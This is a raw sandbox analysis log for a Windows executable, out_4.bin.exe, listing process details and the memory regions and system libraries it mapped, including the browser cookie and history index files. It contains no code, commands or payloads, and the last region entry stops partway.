# Flog Txt Version 1 # Analyzer Version: 2023.1.0 # Analyzer Build Date: Jan 31 2023 05:27:17 # Log Creation Date: 04.03.2023 23:50:53.602 Process: id = "1" image_name = "out_4.bin.exe" filename = "c:\\users\\keecfmwgj\\desktop\\out_4.bin.exe" page_root = "0x4055d000" os_pid = "0xf40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x760" cmd_line = "\"C:\\Users\\kEecfMwgj\\Desktop\\out_4.bin.exe\" " cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f3d7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 112 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 113 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 114 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 115 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 116 start_va = 0x130000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 117 start_va = 0x310000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 118 start_va = 0x1230000 end_va = 0x1257fff monitored = 1 entry_point = 0x123755f region_type = mapped_file name = "out_4.bin.exe" filename = "\\Users\\kEecfMwgj\\Desktop\\out_4.bin.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\out_4.bin.exe") Region: id = 119 start_va = 0x77280000 end_va = 0x77428fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 120 start_va = 0x77460000 end_va = 0x775dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 121 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 122 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 123 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 124 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 125 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 126 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 127 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 267 start_va = 0x170000 end_va = 0x30ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 268 start_va = 0x73bf0000 end_va = 0x73c2efff monitored = 0 entry_point = 0x73c1e088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 269 start_va = 0x73b90000 end_va = 0x73bebfff monitored = 0 entry_point = 0x73bcf9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 270 start_va = 0x73b80000 end_va = 0x73b87fff monitored = 0 entry_point = 0x73b820f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 271 start_va = 0x77160000 end_va = 0x7727efff monitored = 0 entry_point = 0x77175340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 272 start_va = 0x75130000 end_va = 0x7523ffff monitored = 0 entry_point = 0x75143283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 273 start_va = 0x77160000 end_va = 0x7727efff monitored = 0 entry_point = 0x77175340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 274 start_va = 0x77160000 end_va = 0x7727efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077160000" filename = "" Region: id = 275 start_va = 0x77060000 end_va = 0x77159fff monitored = 0 entry_point = 0x7707a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 276 start_va = 0x77060000 end_va = 0x77159fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077060000" filename = "" Region: id = 277 start_va = 0x410000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 278 start_va = 0x75130000 end_va = 0x7523ffff monitored = 0 entry_point = 0x75143283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 279 start_va = 0x75040000 end_va = 0x75086fff monitored = 0 entry_point = 0x750474c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 280 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 281 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 282 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 283 start_va = 0x60000 end_va = 0xc6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 284 start_va = 0x75810000 end_va = 0x7590ffff monitored = 0 entry_point = 0x7582b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 285 start_va = 0x75a40000 end_va = 0x75acffff monitored = 0 entry_point = 0x75a56343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 286 start_va = 0x75400000 end_va = 0x75409fff monitored = 0 entry_point = 0x754036a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 287 start_va = 0x76120000 end_va = 0x761bcfff monitored = 0 entry_point = 0x76153fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 288 start_va = 0x75600000 end_va = 0x756abfff monitored = 0 entry_point = 0x7560a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 289 start_va = 0x75910000 end_va = 0x759affff monitored = 0 entry_point = 0x759249e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 290 start_va = 0x76e10000 end_va = 0x76e28fff monitored = 0 entry_point = 0x76e14975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 291 start_va = 0x75c60000 end_va = 0x75d4ffff monitored = 0 entry_point = 0x75c70569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 292 start_va = 0x74fb0000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74fca3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 293 start_va = 0x74fa0000 end_va = 0x74fabfff monitored = 0 entry_point = 0x74fa10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 294 start_va = 0x761c0000 end_va = 0x76e09fff monitored = 0 entry_point = 0x76241601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 295 start_va = 0x753a0000 end_va = 0x753f6fff monitored = 0 entry_point = 0x753b9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 296 start_va = 0x74e40000 end_va = 0x74e97fff monitored = 0 entry_point = 0x74e413b4 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 297 start_va = 0x74df0000 end_va = 0x74e3efff monitored = 0 entry_point = 0x74df1452 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\SysWOW64\\webio.dll" (normalized: "c:\\windows\\syswow64\\webio.dll") Region: id = 298 start_va = 0x75410000 end_va = 0x75545fff monitored = 0 entry_point = 0x75411b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 299 start_va = 0x75b50000 end_va = 0x75c44fff monitored = 0 entry_point = 0x75b51865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 300 start_va = 0x76e30000 end_va = 0x7702afff monitored = 0 entry_point = 0x76e322d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 301 start_va = 0x756b0000 end_va = 0x7580bfff monitored = 0 entry_point = 0x756fba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 302 start_va = 0x76030000 end_va = 0x760befff monitored = 0 entry_point = 0x76033fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 303 start_va = 0x75f00000 end_va = 0x76020fff monitored = 0 entry_point = 0x75f0158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 304 start_va = 0x75ef0000 end_va = 0x75efbfff monitored = 0 entry_point = 0x75ef238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 305 start_va = 0x75090000 end_va = 0x750c4fff monitored = 0 entry_point = 0x7509145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 306 start_va = 0x77430000 end_va = 0x77435fff monitored = 0 entry_point = 0x77431782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 307 start_va = 0x630000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 308 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 309 start_va = 0x7a0000 end_va = 0x927fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 310 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 311 start_va = 0x755a0000 end_va = 0x755fffff monitored = 0 entry_point = 0x755b158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 312 start_va = 0x75240000 end_va = 0x7530bfff monitored = 0 entry_point = 0x7524168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 313 start_va = 0x930000 end_va = 0xab0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 314 start_va = 0x1260000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001260000" filename = "" Region: id = 315 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 316 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 317 start_va = 0x73a50000 end_va = 0x73a52fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 318 start_va = 0xac0000 end_va = 0xd8efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 319 start_va = 0x74030000 end_va = 0x7406bfff monitored = 0 entry_point = 0x7403145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 320 start_va = 0x170000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 321 start_va = 0x290000 end_va = 0x30ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 322 start_va = 0x74020000 end_va = 0x74024fff monitored = 0 entry_point = 0x740215df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 323 start_va = 0x170000 end_va = 0x22ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 324 start_va = 0x230000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 325 start_va = 0x470000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 326 start_va = 0x530000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 327 start_va = 0xe80000 end_va = 0xf7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 328 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 329 start_va = 0x73e00000 end_va = 0x73e16fff monitored = 0 entry_point = 0x73e03573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 330 start_va = 0x74de0000 end_va = 0x74de7fff monitored = 0 entry_point = 0x74de34d3 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\SysWOW64\\credssp.dll" (normalized: "c:\\windows\\syswow64\\credssp.dll") Region: id = 331 start_va = 0x74020000 end_va = 0x74024fff monitored = 0 entry_point = 0x740215df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 332 start_va = 0x74010000 end_va = 0x74015fff monitored = 0 entry_point = 0x74011673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll") Region: id = 333 start_va = 0x740a0000 end_va = 0x740e3fff monitored = 0 entry_point = 0x740b63f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 334 start_va = 0xf80000 end_va = 0x114ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f80000" filename = "" Region: id = 335 start_va = 0x4f0000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 336 start_va = 0x630000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 337 start_va = 0x740000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 338 start_va = 0x790000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 339 start_va = 0xfd0000 end_va = 0x10cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 340 start_va = 0x1110000 end_va = 0x114ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001110000" filename = "" Region: id = 341 start_va = 0x74080000 end_va = 0x7409bfff monitored = 0 entry_point = 0x7408a431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 342 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 343 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 344 start_va = 0x74070000 end_va = 0x74076fff monitored = 0 entry_point = 0x7407128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 345 start_va = 0x74000000 end_va = 0x74005fff monitored = 0 entry_point = 0x740014b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 346 start_va = 0x73f40000 end_va = 0x73f77fff monitored = 0 entry_point = 0x73f4990e region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 347 start_va = 0x2660000 end_va = 0x280ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002660000" filename = "" Region: id = 348 start_va = 0x740f0000 end_va = 0x74110fff monitored = 0 entry_point = 0x740f145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 349 start_va = 0x75550000 end_va = 0x75594fff monitored = 0 entry_point = 0x755511e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 350 start_va = 0x73900000 end_va = 0x73908fff monitored = 0 entry_point = 0x73901220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 351 start_va = 0xd0000 end_va = 0xd7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\urlmon.dll.mui") Region: id = 352 start_va = 0x2660000 end_va = 0x275ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002660000" filename = "" Region: id = 353 start_va = 0x27d0000 end_va = 0x280ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027d0000" filename = "" Region: id = 354 start_va = 0x73f80000 end_va = 0x73ffffff monitored = 0 entry_point = 0x73f937c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 355 start_va = 0x2810000 end_va = 0x29cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002810000" filename = "" Region: id = 356 start_va = 0xd90000 end_va = 0xe6efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d90000" filename = "" Region: id = 357 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 358 start_va = 0x74130000 end_va = 0x742cdfff monitored = 0 entry_point = 0x7415e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 359 start_va = 0xf0000 end_va = 0xf0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 360 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 361 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 362 start_va = 0x74120000 end_va = 0x7412afff monitored = 0 entry_point = 0x74121992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 363 start_va = 0x110000 end_va = 0x11ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 364 start_va = 0x120000 end_va = 0x127fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 365 start_va = 0x270000 end_va = 0x27ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 366 start_va = 0x73eb0000 end_va = 0x73f01fff monitored = 0 entry_point = 0x73eb14be region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 367 start_va = 0x73e90000 end_va = 0x73ea4fff monitored = 0 entry_point = 0x73e912de region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 368 start_va = 0x73e80000 end_va = 0x73e8cfff monitored = 0 entry_point = 0x73e81326 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 369 start_va = 0x280000 end_va = 0x280fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 370 start_va = 0x280000 end_va = 0x280fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 371 start_va = 0x73e70000 end_va = 0x73e75fff monitored = 0 entry_point = 0x73e7125a region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\SysWOW64\\SensApi.dll" (normalized: "c:\\windows\\syswow64\\sensapi.dll") Region: id = 372 start_va = 0x11a0000 end_va = 0x11dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 373 start_va = 0x2860000 end_va = 0x289ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002860000" filename = "" Region: id = 374 start_va = 0x2990000 end_va = 0x29cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002990000" filename = "" Region: id = 375 start_va = 0x2b20000 end_va = 0x2c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b20000" filename = "" Region: id = 376 start_va = 0x2ce0000 end_va = 0x2ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ce0000" filename = "" Region: id = 377 start_va = 0x75c50000 end_va = 0x75c52fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\SysWOW64\\normaliz.dll" (normalized: "c:\\windows\\syswow64\\normaliz.dll") Region: id = 378 start_va = 0x7efa7000 end_va = 0x7efa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 379 start_va = 0x7efaa000 end_va = 0x7efacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 380 start_va = 0x2950000 end_va = 0x298ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002950000" filename = "" Region: id = 381 start_va = 0x2e00000 end_va = 0x2efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 382 start_va = 0x7efa4000 end_va = 0x7efa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 383 start_va = 0x74dc0000 end_va = 0x74dd6fff monitored = 0 entry_point = 0x74dc1c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 384 start_va = 0x75100000 end_va = 0x7512efff monitored = 0 entry_point = 0x75102a35 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 385 start_va = 0x72400000 end_va = 0x7243efff monitored = 0 entry_point = 0x72402351 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 386 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 387 start_va = 0x73e60000 end_va = 0x73e6ffff monitored = 0 entry_point = 0x73e638c1 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll") Region: id = 388 start_va = 0x2f00000 end_va = 0x30bffff monitored = 1 entry_point = 0x0 region_type = private 